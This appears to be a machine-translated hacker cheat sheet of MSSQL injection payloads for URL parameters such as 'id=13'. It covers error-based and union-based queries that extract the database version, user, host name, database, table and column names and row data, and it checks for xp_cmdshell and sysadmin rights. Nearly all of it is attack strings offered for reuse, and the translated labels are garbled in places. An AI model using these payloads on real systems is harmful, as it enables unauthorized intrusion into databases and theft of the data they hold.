MSSQL injection in error-and-error mode

Title:mssql injection in explicit and non-error mode--2010-10-27 19:51

The recent use of manual injection with the habit, then list the most recent use of the MSSQL statement, later convenient to use!

--------------------------------------------------------------------------------------------------------------- --------------------

MSSQL Comment Symbol:

#

--

Error-mode:

Determine if multiple rows are supported

;d Eclare @x int--

View Current database version

Url?id=13 and @ @version >0--

View current Connected Database users

Url?id=13 and user>0--

View the current database name

Url?id=13 and db_name () >0--

Explode database name

Url?id=13 and 1=convert (int, (select name from master.dbo.sysdatabases where dbid=7))--

Dbid<7 is the system library name

Explode the current database table name

Url?id=13 and 1=convert (int, (select top 1 name from sysobjects where xtype= ' U '))--

Url?id=13 and 1=convert (int, (select top 1 name from sysobjects where xtype= ' U ' and name is not in (' Table name 1 ', ' Table Name 2 '))--

Explode other database table names

Url?id=13 and 1=convert (int, (select top 1 name from [database name]: sysobjects where xtype= ' u ')--

Url?id=13 and 1=convert (int, (select top 1 name from [database name]: sysobjects where xtype= ' u ' and name not in (' Table name 1 ', ' Table Name 2 '))--

Burst field Name

Url?id=13 having 1=1--

URL?ID=13 Group By table name. field Name 1, field name 2 having 1=1--

Explode the field names of other tables

URL?ID=13 select * FROM table name having 1=1--

URL?ID=13 select * FROM table name Group by table name. field Name 1, field name 2 having 1=1--

Expand it.

Url?id=13 and 1=convert (int, (SELECT * from table name having 1=1)--field name

Url?id=13 and 1=convert (int, (SELECT * from table name Group by table name. Field name having 1=1))--Field name

Burst data

Url?id=13 and 1=convert (int, (select top 1 field name from table name))--

Url?id=13 and 1=convert (int, (select top 1 field name from table name where field name not in (' Data 1 ', ' Data 2 ')--

Url?id=13 and 1=convert (int, (select TOP1 field name from table name where field name = = ' Data 1 ' and field name! = ' Data 2 '--

You can also use the WHERE statement

No error mode

url?id=13 Order By Field number

URL?ID=13 and 1=2 Union select?,?,?,?,?--

Querying the database version and system version

URL?ID=13 and 1=2 Union select?,?,?, @ @version--

Querying database user Names

URL?ID=13 and 1=2 Union select?,?,?, (Select User)--

URL?ID=13 and 1=2 Union select?,?,?, (select System_user)--

Query Host Name

URL?ID=13 and 1=2 Union select?,?,?, (select HOST_NAME ())--

Querying database names

URL?ID=13 and 1=2 Union select?,?,?, (select Db_name ())--

Determine storage extension xp_cmdshell

URL?ID=13 and 1=2 Union select?,?,?, (SELECT COUNT (*) from master.dbo.sysobjects where xtype= ' X ' and name= ' xp_cmdshell ')--

1 for existence, 0 for non-existent

Determine current database user permissions

URL?ID=13 and 1=2 Union select?,?,?, (select Is_srvrolemember (' sysadmin '))--

Querying database names

URL?ID=13 and 1=2 Union select?,?,? (select name from master.dbo.sysdatabases where dbid=7)--

DBID<7 is the system database name

Querying database table names

URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from sysobjects where xtype= ' U ')--

URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from sysobjects where xtype= ' U ' and name is not in (' Table name 1 ', ' Table Name 2 ')--

Query field name

URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from database name. Dbo.syscolumns where id=object_id (' table name ')--

URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from database name. Dbo.syscolumns where id=object_id (' table name ') and name not in (' Field name 1 ', ' Field Name 2 ')--

Querying data

URL?ID=13 and 1=2 Union select?,?,? (select top 1 field name from table name)--

URL?ID=13 and 1=2 Union select?,?,? (select top 1 field name from table name where field name not in (' Data 1 ', ' Data 2 ')--

The other statements

Name of the exploded table

Url?id=13 Url?id=13 and 1=2 Union select?,?,? (select top 1 name from sysobjects where xtype= ' u ' and name is not in (select top 0 name from sysobjects where xtype= ' u ')) fro M sysobjects--

Then query the table name (the number of the second top n is incremented from 0 to traverse the current database table name.

Explode other database table names

Url?id=13 Url?id=13 and 1=2 Union select?,?,? (select top 1 name from [database name]: sysobjects where xtype= ' u ' and name not in (select top 0 name from [database name]: sysobjects where xtype= ' u ')

Explode field

URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from syscolumns where ID in (select id from sysobjects where name= ' table name ') and name not in (select Top 2 n Ame from syscolumns where ID in (select id from sysobjects where name= ' table name '))) from sysobjects--

Add the second top N number from 0 to traverse the field name of the admin table.

Querying data

Url?id=13 Url?id=13 and 1=2 Union select top 1?,?, field name from table name where name not in (select top 0 name from table name)--

MSSQL injection in error-and-error mode